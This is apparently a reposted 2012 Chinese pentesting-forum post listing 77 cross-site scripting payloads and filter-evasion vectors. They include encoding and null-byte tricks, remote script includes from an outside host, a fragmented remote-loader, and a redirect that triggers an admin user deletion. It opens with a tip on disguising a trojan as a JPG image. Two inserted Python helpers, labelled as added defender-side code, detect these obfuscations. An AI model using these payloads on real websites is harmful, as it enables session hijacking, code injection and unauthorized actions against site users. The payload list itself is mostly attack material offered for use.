中国网络渗透测试联盟
Title: Detailed XSS Exploitation Compendium, Part 1
Author: admin
Time: 2012-9-13 17:04
Cross-site image shell

XSS cross-site code: <script>alert("")</script>

Put the code on the first line of the trojan and change the trojan into JPG image format; when the image-format trojan is visited, our trojan is executed as well.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab splitting up "javascript"
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab splitting up "javascript"
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically useless domestically, because there is nowhere to use them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
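As an added defender-side example (not part of the original post), the following Python helper normalises an attribute value the way lenient HTML parsers do before checking its URL scheme, so that the case, entity-encoding, whitespace and null-byte variants in entries (3) to (19) above all reduce to the same javascript: scheme; the sample values are constructed here after those entries, and the function names are this example's own.

```python
import html
import re

# Scheme names the payloads above rely on (entries 3-19 and 40).
SCRIPT_SCHEMES = {"javascript", "vbscript"}
# Tab, newline and CR are dropped anywhere inside a URL by the URL parser
# (entries 11-14); NUL was tolerated by older engines (entry 17).
_INNER_STRIP = re.compile(r"[\t\n\r\x00]")
# Leading/trailing C0 controls and spaces are trimmed (entry 19).
_EDGE_STRIP = re.compile(r"^[\x00-\x20]+|[\x00-\x20]+$")

def normalize_attr_url(value: str) -> str:
    """Attribute value as a browser sees it after HTML decoding and stripping.
    html.unescape also decodes numeric references with no trailing semicolon
    (entries 5 and 8-10)."""
    decoded = _EDGE_STRIP.sub("", html.unescape(value))
    return _INNER_STRIP.sub("", decoded)

def url_scheme(value: str) -> str:
    """Lower-cased scheme of the normalised value, or '' if it has none."""
    scheme, sep, _rest = normalize_attr_url(value).partition(":")
    # A scheme is letters/digits/'+'/'-'/'.'; anything else is not a scheme.
    if not sep or not re.fullmatch(r"[A-Za-z][A-Za-z0-9+.-]*", scheme):
        return ""
    return scheme.lower()

def is_script_url(value: str) -> bool:
    """True when the value would execute script rather than fetch a resource."""
    return url_scheme(value) in SCRIPT_SCHEMES

# Constructed samples modelled on the entries above (not taken verbatim).
CONSTRUCTED_SAMPLES = [
    "javascript:alert('XSS')",                                     # entry 3
    "JaVaScRiPt:alert('XSS')",                                     # entry 4
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",  # entry 5
    "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114"
    "&#0000105&#0000112&#0000116&#0000058alert('XSS')",            # entry 9
    "jav\tascript:alert('XSS');",                                  # entry 11
    "jav&#x09;ascript:alert('XSS');",                              # entry 12
    "java\x00script:alert('XSS')",                                 # entry 17
    " javascript:alert('XSS');",                                   # entry 19
    "http://3w.org/XSS/xss.js",                                    # benign URL
    "images/xss.jpg",                                              # benign path
]

def flag_samples(samples=CONSTRUCTED_SAMPLES):
    """(sample, scheme) pairs for the samples that would run script."""
    return [(s, url_scheme(s)) for s in samples if is_script_url(s)]
```

A filter that only string-matches the literal text "javascript:" misses every one of the flagged samples except the first; checking the normalised scheme catches them all while leaving the two benign values alone.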
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with linked URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made up of an opening angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript in Flash, you can smuggle your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can add the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Decimal IP
<A HREF="http://3232235521">XSS</A>

(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
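As an added defender-side example (not from the original post), this Python helper canonicalises link targets of the kinds shown in entries (70) to (76) the way a browser's URL parser does, so that a host allow-list is compared against the host actually contacted rather than the obfuscated text; the decimal, hex and octal IPv4 rules follow the WHATWG URL parser, the sample URLs are constructed after those entries, and the function names are this example's own.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

# One dotted part of a legacy IPv4 literal: 0x.. hex, leading-zero octal, or decimal.
_NUMERIC = re.compile(r"^(0[xX][0-9a-fA-F]*|0[0-7]*|[1-9][0-9]*)$")

def _ipv4_part(part: str) -> int:
    """Parse one part with the base its prefix implies."""
    if part[:2].lower() == "0x":
        return int(part[2:] or "0", 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part)

def canonical_ipv4(host: str) -> Optional[str]:
    """Canonicalise a legacy IPv4 literal as browsers do (entries 70-73):
    one to four parts, each decimal, hex or octal, the last part filling the
    remaining bytes. Returns a dotted quad, or None if not an IPv4 literal."""
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":
        parts.pop()                          # one trailing dot is permitted
    if not 1 <= len(parts) <= 4 or not all(_NUMERIC.match(p) for p in parts):
        return None
    nums = [_ipv4_part(p) for p in parts]
    if any(n > 255 for n in nums[:-1]) or nums[-1] >= 256 ** (5 - len(nums)):
        return None
    value = nums[-1]
    for i, n in enumerate(nums[:-1]):
        value += n << (8 * (3 - i))
    return ".".join(str((value >> s) & 0xFF) for s in (24, 16, 8, 0))

def canonical_host(url: str) -> str:
    """Host a browser would actually contact for the link (lower-cased,
    trailing dot removed, IPv4 literal rewritten as a dotted quad)."""
    cleaned = re.sub(r"[\t\n\r]", "", url)    # entry 73: embedded tab/newline
    host = urlsplit(cleaned).hostname or ""   # scheme-relative links too (entry 74)
    host = host.rstrip(".")                   # entry 76: absolute DNS name
    return canonical_ipv4(host) or host
```

Comparing canonical_host(link) against an allow-list makes the decimal, hex, octal and mixed forms of the same address indistinguishable from its dotted-quad form.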
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/)